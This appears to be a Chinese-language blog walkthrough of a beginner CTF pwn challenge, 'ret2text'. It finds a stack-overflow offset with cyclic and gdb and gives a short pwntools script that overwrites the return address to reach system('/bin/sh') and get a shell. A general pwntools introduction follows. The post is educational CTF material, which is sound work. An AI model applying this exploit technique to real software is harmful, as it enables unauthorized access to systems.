pwn,获取系统权限,入门题,cyclic

https://pan.baidu.com/s/1qy5cyX-RJDyl3wxOXypHtA
dx5d
这里写图片描述

  • 输入【./ret2text】运行程序,发现让你输入,那么我们先随便输入个【123456】,程序结束了。

- 列表内容

  • 用ida打开这个程序,发现有‘system’函数,还可以输入,那么就可以利用栈溢出获取系统权限。

这里写图片描述

  • 首先先多输入点,看看什么时候溢出,这里用cyclic有序字符串。

  • 输入【cyclic 200】生成200个有序字符。
    这里写图片描述

  • 用gdb打开ret2text,输入【gdb ret2text】。
    这里写图片描述

  • 输入【run】运行程序,程序让我们输入,则把刚生成的200个有序字符串输入,发现报错,那么就是溢出了。

  • 观察可知溢出的地方是‘0x62616164’。

  • 那么怎么知道到底有多少个数字溢出了呢?

  • 看他报错的意思是(跳转到0x62616164)这步出错了,意思就是没有0x62616164这个位置,那这个位置是从哪来的呢,就是我们200个有序字符其中最先溢出的第部分。那么只要知道这个0x62616164是我们输入的第几个,就可以数出来它前头有几个数字了。根据ASCII码表,又根据‘0x’是16进制的意思,可以查表得出这串数字转换成字母是‘baad’。接下来就要知道cyclic的顺序了,稍微观察一下就可以知道cyclic的规则(4个数4个数有规则),轻易的就可以数出它的位置。

  • 当然还有更简单的方法,前文也说了cyclic是有序字符串,自然有一个子函数可以查,“cyclic -l”代表着查询你所给的4bit字符前有几个字母。

  • 输入【cyclic -l 0x62616164】,得到112,说明‘baad’前有112个字母,那么这112个字母就是填充空栈的所需量了。接下来多的就会溢出。

  • 那么我们就要把我们要他跳转的位置放在112个字母后让他溢出,就可以实现跳转。
    这里写图片描述

  • 在ida里找到system函数,但是点进去所显示的语句所在的行数,不是system函数真正的行数,而是引用system函数的语句所在的行数。

  • 看到system和↑或者↓在同一行,点击↑或者↓,点了几次点不了了,就找到了system函数真正的位置。

这里写图片描述

  • 发现system函数的值是‘/bin/sh’,运行这个system函数加这个值就可以获得系统权限。
  • 记录下所要跳转到的这一行,写脚本,将其放在112个填充物的后面。
from pwn import *

sh=process('./ret2text')
elf=ELF('./ret2text')
target=0x0804863A
#即/bin/sh所在位置
sh.sendline('a'*112+p32(target))
#至此就获得了系统权限
sh.interactive()
#打开交互页面

退出gdb,输入【python exp.py ret2text】让程序运行我们的脚本。
终于,我们获得了系统权限。

这里写图片描述

### 使用 `pwntools` 库的方法 #### 安装 `pwntools` 为了使用 `pwntools`,首先需要安装该库。可以通过 Python 的包管理器 pip 来完成安装: ```bash pip install pwntools ``` 如果遇到权限或者希望在虚拟环境中运行,则可以考虑创建一个新的虚拟环境并在此环境下执行上述命令。 #### 基本功能介绍 `pwntools` 是一个专门为 CTF 和二进制漏洞挖掘设计的强大工具集,提供了多种用于网络通信、数据处理以及漏洞利用的功能模块。以下是几个核心组件及其用途[^2]: - **pwn**: 提供了诸如连接服务器 (`remote`)、启动本地进程 (`process`) 或者调试目标程序等功能。 - **asm/disasm**: 支持汇编指令到机器码转换 (assembly to machine code) 及其逆向操作。 - **cyclic patterns**: 自动生成循环字符串模式以便于快速定位溢出偏移量。 - **shellcraft templates**: 预定义了一些常见的 shellcode 片段模板,方便构建自定义 payload。 #### 示例代码解析 这里给出一段简单的示例代码来展示如何通过 `pwntools` 进行基本的远程交互: ```python from pwn import * # 创建一个TCP连接至指定IP和端口上的服务 conn = remote('challenge.example.com', 1337) # 向服务发送消息 conn.sendline(b'hello') # 接收来自服务的数据直到遇见换行符为止 response = conn.recvline() print(response.decode()) # 关闭连接 conn.close() ``` 此脚本实现了与远端主机建立 TCP 连接,并交换了一条问候语句作为演示目的。 另外,在某些情况下可能还需要处理更复杂的场景比如栈缓冲区溢出攻击等高级技巧时,就可以充分利用之前提到过的那些特性如自动计算偏移位置或是生成特定类型的载荷等等[^1]。 对于初学者来说,《Pwn入门_1_pwntools的使用》文档会是非常好的起点材料之一因为它涵盖了从基础概念一直到实际案例分析整个流程;而对于想要探索其他编程语言实现方式的人群而言,“pwntools-ruby”项目则展示了基于Ruby版本下的相似解决方案[^3]。 ### 注意事项 当参与任何真实世界的网络安全活动前,请务必确认已获得适当授权以免违反法律条款!
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值